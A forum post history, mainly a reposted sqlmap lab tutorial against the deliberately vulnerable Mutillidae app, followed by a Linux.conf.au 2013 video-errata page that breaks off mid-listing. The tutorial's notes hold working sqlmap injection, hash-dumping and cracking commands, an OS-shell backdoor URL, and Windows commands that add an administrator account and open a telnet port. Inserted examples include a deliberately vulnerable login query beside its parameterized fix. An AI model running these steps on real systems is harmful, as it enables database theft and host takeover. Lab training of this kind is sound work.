Everything posted by Nytro
-
+ Java SE Proof Of Concept Code ? Packet Storm
-
[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]
Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM

Author: Jeremy Druin
Twitter: @webpwnized
YouTube Channel: webpwnized's channel - YouTube
Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/)

Recorded at the ISSA Kentuckiana February 2013 Workshop, this video reviews the use of sqlmap, an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the Windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is already a large amount of documentation on this feature.

[h=3]Environment[/h]
The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks, including on Linux. Using two hosts is not necessary to recreate the lab exercise; all of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out.

[h=3]Notes from Presentation[/h]
Please find notes from the talk below which can be used to follow along with the video.

--------------------------------------------------
Running SQLMAP Help
--------------------------------------------------
--help            Help
-hh               Double the help

--------------------------------------------------
Running SQLMAP "Manually"
--------------------------------------------------
./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

--------------------------------------------------
Capturing Request To Pass To SQLMAP
--------------------------------------------------
URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login

--------------------------------------------------
Running SQLMAP with "auto-parse"
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--------------------------------------------------
Running SQLMAP with various features
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--banner
web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: MySQL 5.0
banner: '5.5.25a'

--fingerprint
web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: active fingerprint: MySQL >= 5.5.0

--current-user    Retrieve DBMS current user
--current-db      Retrieve DBMS current database
--hostname        Retrieve DBMS server hostname
--is-dba          Detect if the DBMS current user is DBA

current user: 'root@localhost'
current database: 'nowasp'
current user is DBA: True
hostname: 'mutillid-7se1xr'

--users           Enumerate DBMS users
--passwords       Enumerate DBMS users password hashes

database management system users
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'

--dbs             Enumerate DBMS databases

available databases [10]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] owasp10
[*] owasp13
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

--------------------------------------------------
Enumerate DBMS database tables, columns, structure (schema)
--------------------------------------------------
--tables          Enumerate DBMS database tables
--columns         Enumerate DBMS database table columns
--schema          Enumerate DBMS schema
--count           Retrieve number of entries for table(s)
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
-D DB             DBMS database to enumerate
-T TBL            DBMS database table to enumerate
-C COL            DBMS database table column to enumerate
-U USER           DBMS user to enumerate

--------------------------------------------------
Extracting data
--------------------------------------------------
--dump            Dump DBMS database table entries
--dump-all        Dump all DBMS databases tables entries
-D DB             DBMS database to enumerate
-T TBL            DBMS database table to enumerate
-C COL            DBMS database table column to enumerate
-U USER           DBMS user to enumerate
--exclude-sysdbs  Exclude DBMS system databases when enumerating tables
--start=LIMITSTART  First query output entry to retrieve
--stop=LIMITSTOP    Last query output entry to retrieve
--sql-query=QUERY   SQL statement to be executed
--sql-shell         Prompt for an interactive SQL shell

--------------------------------------------------
Listing columns from tables
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject

--------------------------------------------------
Advanced: Modifying injections
--------------------------------------------------
SELECT * FROM accounts WHERE username='' AND password='''

./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

--prefix=PREFIX   Injection payload prefix string
--suffix=SUFFIX   Injection payload suffix string

--------------------------------------------------
Advanced: Dealing with inconsistent results
--------------------------------------------------
select User, Password from mysql.user

versus

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

--------------------------------------------------
Cracking MySQL Password Hashes
--------------------------------------------------
John the Ripper Command Line
/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password Hashes in MySQL Format
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

--------------------------------------------------
Understanding sqlmap O/S Shell
--------------------------------------------------
View transaction: tcpdump -i eth1 -vvv -X

1st Stage Uploader
2nd Stage Command Shell Page

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

--------------------------------------------------
Interacting Directly with sqlmap O/S Shell Backdoor
--------------------------------------------------
http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

--------------------------------------------------
Direct connection to the database
--------------------------------------------------
Installing Py-MySQL Dependency
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

Source: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool
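The notes under "Advanced: Modifying injections" show the query the login page builds, `SELECT * FROM accounts WHERE username='' AND password='''`, and the `'-- ` suffix sqlmap is told to append. The following is an added example, not code from the webpwnized post or from Mutillidae: it builds that query the vulnerable way and the parameterized way side by side, using an in-memory SQLite table with constructed rows in place of the MySQL `accounts` table, so the difference between "quote becomes syntax" and "quote stays data" can be run and checked offline.

```python
"""Added example (not from the post or Mutillidae): the login query from the
sqlmap notes built by string concatenation vs. with bound parameters.
SQLite stands in for MySQL; the accounts table and rows are constructed."""
import sqlite3

# Constructed sample data standing in for Mutillidae's `accounts` table.
SAMPLE_ACCOUNTS = [
    ("admin", "adminpass"),
    ("Simba", "correct horse battery staple"),
]


def make_db():
    """In-memory SQLite database with an `accounts` table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query of the shape shown in the notes:
    SELECT * FROM accounts WHERE username='...' AND password='...'
    Every quote or comment marker in the input becomes SQL syntax."""
    query = ("SELECT * FROM accounts WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver passes the values
    separately from the SQL text, so quotes and `--` remain plain data."""
    query = "SELECT * FROM accounts WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def single_quote_breaks_vulnerable(conn):
    """A lone quote (the password=''' case in the notes) is a syntax error in
    the concatenated query; that error is what an error-based probe detects."""
    try:
        login_vulnerable(conn, "", "'")
    except sqlite3.Error:
        return True
    return False


def demo():
    """Run both versions with a valid login and with the notes' `'-- ` suffix
    in the username, which comments out the password check when concatenated."""
    conn = make_db()
    injected_user = "admin'-- "
    return {
        "valid_vulnerable": login_vulnerable(conn, "admin", "adminpass"),
        "valid_safe": login_safe(conn, "admin", "adminpass"),
        "injected_vulnerable": login_vulnerable(conn, injected_user, "wrong"),
        "injected_safe": login_safe(conn, injected_user, "wrong"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {'logged in' if outcome else 'rejected'}")
    print("quote causes SQL error in vulnerable version:",
          single_quote_breaks_vulnerable(make_db()))
```

The parameterized form is the fix for every injection the notes enumerate, because sqlmap's prefix/suffix tricks only work when the input is spliced into the statement text. Storing plaintext passwords, as the constructed table does to match the page's query, is a separate weakness that bound parameters do not address.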
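The `mysql.user` rows dumped under "Dealing with inconsistent results" show what made the rest of the walkthrough possible: `root` and the anonymous account with empty passwords, `root` allowed in from a host other than `localhost`, and the remaining accounts using the unsalted `mysql-sha1` format that the John the Ripper step cracks offline. The following is an added example, not code from the post: it parses that output format (the nine rows are copied from the post; the checks and their wording are this example's own) and reports the account-configuration findings a DBA should act on before an application like Mutillidae is ever exposed.

```python
"""Added example (not from the post): audit mysql.user rows in the
`[*] User, Password, Host, authentication_string` format sqlmap printed.
Rows are copied from the post's output; the checks are this example's own."""
import re

# Output copied from the post ("select User, Password, Host,
# authentication_string from mysql.user order by User desc [9]").
MYSQL_USER_DUMP = """\
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,
"""

NEW_HASH = re.compile(r"^\*[0-9A-F]{40}$")  # MySQL 4.1+ format (john: mysql-sha1), unsalted
OLD_HASH = re.compile(r"^[0-9a-f]{16}$")    # pre-4.1 16-hex format, weaker still
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_dump(text):
    """Turn `[*] a, b, c, d` lines into dicts; empty fields are kept as ''."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("[*]"):
            continue
        fields = [f.strip() for f in line[3:].split(",")]
        fields += [""] * (4 - len(fields))  # tolerate dropped trailing empties
        user, password, host, auth_string = fields[:4]
        rows.append({"user": user, "password": password,
                     "host": host, "auth_string": auth_string})
    return rows


def audit(rows):
    """Return (account, finding) pairs for the weaknesses visible in the dump."""
    findings = []
    for r in rows:
        acct = f"'{r['user']}'@'{r['host']}'"
        pw = r["password"]
        if r["user"] == "":
            findings.append((acct, "anonymous account"))
        if pw == "" and r["auth_string"] == "":
            findings.append((acct, "empty password"))
        elif OLD_HASH.match(pw):
            findings.append((acct, "pre-4.1 password hash"))
        elif NEW_HASH.match(pw):
            findings.append((acct, "unsalted mysql-sha1 hash"))
        if r["user"] == "root" and r["host"] not in LOCAL_HOSTS:
            findings.append((acct, "root login allowed from non-local host"))
    return findings


def summarize(findings):
    """Count findings per category, for a quick view of what to fix first."""
    counts = {}
    for _, finding in findings:
        counts[finding] = counts.get(finding, 0) + 1
    return counts


if __name__ == "__main__":
    results = audit(parse_dump(MYSQL_USER_DUMP))
    for account, finding in results:
        print(f"{account:<22} {finding}")
    print(summarize(results))
```

On the post's data this flags five empty-password accounts, two anonymous accounts, root reachable from the `linux` host, and four unsalted hashes. Dropping the anonymous accounts, setting passwords on `root` and `pma`, and restricting `root` to local hosts removes most of what the `--os-shell` stage in the notes relied on.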
-
Linux.conf.au 2013 Videos

We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible.

Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way.

Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it.

Videos we know have problems:

Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13.

Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13.

Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source'. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13.

Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13.

Bufferbloat from a Plumber's point of view (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13.

The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13.

High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13.

Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13.

The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13.

Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13.

Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support!
Paul Wayper, AV Wrangler [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_Printing_with_Repsnapper.mp4[/TD] [TD=align: right]02-Feb-2013 18:00 [/TD] [TD=align: right] 88M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 91M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD] [TD=align: right]03-Feb-2013 16:55 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]After_Arduino.mp4[/TD] [TD=align: right]04-Feb-2013 10:13 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD] [TD=align: right]03-Feb-2013 12:21 [/TD] [TD=align: right]260M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ArduSat_Open_Source_in_orbit.mp4[/TD] [TD=align: right]02-Feb-2013 19:21 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Big_and_Little_Endian_inside_out.mp4[/TD] [TD=align: right]04-Feb-2013 10:25 [/TD] [TD=align: right]112M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD] [TD=align: right]02-Feb-2013 17:46 [/TD] [TD=align: right]7.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD] [TD=align: right]03-Feb-2013 17:41 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_a_free_software_telemetry_radio_system.mp4[/TD] [TD=align: right]02-Feb-2013 21:05 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] 
[/TR] [TR] [TD][/TD] [TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 16:18 [/TD] [TD=align: right]155M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD] [TD=align: right]02-Feb-2013 18:51 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD] [TD=align: right]02-Feb-2013 20:05 [/TD] [TD=align: right] 54M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing.mp4[/TD] [TD=align: right]03-Feb-2013 17:35 [/TD] [TD=align: right]210M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing_Lightning_Talks.mp4[/TD] [TD=align: right]03-Feb-2013 17:20 [/TD] [TD=align: right]124M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD] [TD=align: right]02-Feb-2013 19:11 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD] [TD=align: right]02-Feb-2013 20:07 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD] [TD=align: right]04-Feb-2013 13:20 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Free_and_open_source_software_and_activism.mp4[/TD] [TD=align: right]04-Feb-2013 13:10 [/TD] [TD=align: right]167K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Future_directions_for_the_X_Window_System.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD] [TD=align: right]02-Feb-2013 19:20 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] 
[TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD] [TD=align: right]02-Feb-2013 18:48 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_For_Ages_4_And_Up.mp4[/TD] [TD=align: right]02-Feb-2013 22:52 [/TD] [TD=align: right]342M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_not_just_for_source_code_anymore.mp4[/TD] [TD=align: right]02-Feb-2013 20:29 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD] [TD=align: right]03-Feb-2013 18:12 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]HEADER.html[/TD] [TD=align: right]06-Feb-2013 11:05 [/TD] [TD=align: right]4.4K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD] [TD=align: right]03-Feb-2013 16:38 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD] [TD=align: right]04-Feb-2013 09:27 [/TD] [TD=align: right] 69M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_Fix_a_Font.mp4[/TD] [TD=align: right]03-Feb-2013 00:15 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_make_almost_anything_go_faster.mp4[/TD] [TD=align: right]03-Feb-2013 00:02 [/TD] [TD=align: right] 51M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_use_Puppet_like_an_Adult.mp4[/TD] [TD=align: right]03-Feb-2013 11:56 [/TD] [TD=align: right] 85M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD] [TD=align: right]03-Feb-2013 01:37 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Radia_Perlman.mp4[/TD] [TD=align: right]03-Feb-2013 11:33 [/TD] [TD=align: right]117M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD] [TD=align: right]04-Feb-2013 12:19 [/TD] [TD=align: right] 86M[/TD] [TD] 
[/TD] [/TR] [TR] [TD][/TD] [TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD] [TD=align: right]04-Feb-2013 09:34 [/TD] [TD=align: right] 56M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 35M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Main_conference_opening.mp4[/TD] [TD=align: right]02-Feb-2013 17:57 [/TD] [TD=align: right] 84M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_Mobile_Communications_Secure.mp4[/TD] [TD=align: right]04-Feb-2013 11:05 [/TD] [TD=align: right]116M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD] [TD=align: right]02-Feb-2013 19:34 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD] [TD=align: right]02-Feb-2013 21:02 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Maximum_Clojure_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 21:04 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 22:03 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MySQL_in_the_cloud_as_a_service.mp4[/TD] [TD=align: right]03-Feb-2013 17:17 [/TD] [TD=align: right]166M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NetFPGA_USB_2_interface.mp4[/TD] [TD=align: right]02-Feb-2013 22:40 [/TD] [TD=align: right]148M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD] [TD=align: right]03-Feb-2013 16:41 [/TD] [TD=align: right] 97M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD] [TD=align: right]04-Feb-2013 12:24 [/TD] 
[TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: 
